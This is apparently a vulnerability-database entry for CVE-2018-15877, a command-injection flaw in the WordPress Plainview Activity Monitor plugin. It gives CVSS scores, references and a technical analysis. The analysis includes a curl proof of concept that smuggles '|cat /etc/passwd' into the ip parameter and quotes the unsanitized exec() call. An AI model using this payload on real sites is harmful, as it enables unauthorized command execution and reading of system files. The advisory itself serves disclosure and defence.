Attacker Value

Low

(1 user assessed)

Exploitability

Very High

(1 user assessed)

User Interaction

CVE-2018-15877

Disclosure Date: August 26, 2018 •

CVE-2018-15877 CVSS v3 Base Score: 8.8

MITRE ATT&CK

Add MITRE ATT&CK tactics and techniques that apply to this CVE.

Metasploit Module

Wordpress Plainview Activity Monitor RCE

Description

The Plainview Activity Monitor plugin before 20180826 for WordPress is vulnerable to OS command injection via shell metacharacters in the ip parameter of a wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools request.

Add Assessment

cdelafuente-r7 (96)

November 27, 2019 2:59pm UTC (5 years ago)•Edited 5 years ago

Ratings

Attacker Value

Low

Exploitability

Very High

Technical Analysis

This plugin has approximately 1000 active installations and 24,816 downloads according to Wordpress. The vulnerable versions are approximately 25% of the active installations, which is not that much. Also, the attacker needs to be authenticated with a privileged account to make it exploitable, which reduce the likelihood of exploitation. However, the vulnerability is very easy to exploit: a simple HTTP POST request with a specially crafted ip parameter:

curl -b '<your_session_cookie>;' \
     -d 'ip=127.0.0.1|cat%20/etc/passwd&lookup=Lookup&submit=Submit%20request' \
     'http://my_wordpress.com/wp-admin/admin.php?page=plainview_activity_monitor&tab=activity_tools'

The root cause is a call to exec() with concatenation of unsanitized input (activities_overview.php:357):

exec( 'dig -x ' . $ip, $output );

CVSS V3 Severity and Metrics

Data provided by the National Vulnerability Database (NVD)

Base Score:

8.8 High

Impact Score:

5.9

Exploitability Score:

2.8

Vector:

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Attack Vector (AV):

Network

Attack Complexity (AC):

Low

Privileges Required (PR):

Low

User Interaction (UI):

None

Scope (S):

Unchanged

Confidentiality (C):

High

Integrity (I):

High

Availability (A):

High

References

Canonical

CVE-2018-15877 (https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-15877)

Advisory

EXPLOIT-DB-45274 (https://www.exploit-db.com/exploits/45274)

EXPLOIT-DB-45274 (https://www.exploit-db.com/exploits/45274/)

Miscellaneous

https://github.com/aas-n/CVE/tree/master/CVE-2018-15877

http://packetstormsecurity.com/files/155502/WordPress-Plainview-Activity-Monitor-20161228-Remote-Command-Execution.html

http://packetstormsecurity.com/files/163425/WordPress-Plainview-Activity-Monitor-20161228-Remote-Code-Execution.html

Rapid7

Low

CVE-2018-15877

Low

Very High

None

Low

Network

CVE-2018-15877

Description

Add Assessment

Ratings

Technical Analysis

CVSS V3 Severity and Metrics

General Information

Vendors

Products

Metasploit Modules

References

Canonical

Advisory

Miscellaneous

Additional Info

Technical Analysis

Low

CVE-2018-15877

Low

Very High

None

Low

Network

CVE-2018-15877

Description

Add Assessment

Ratings

Technical Analysis

CVSS V3 Severity and Metrics

General Information

Vendors

Products

Metasploit Modules

References

Canonical

Advisory

Miscellaneous

Additional Info

Technical Analysis

Quick Cookie Notification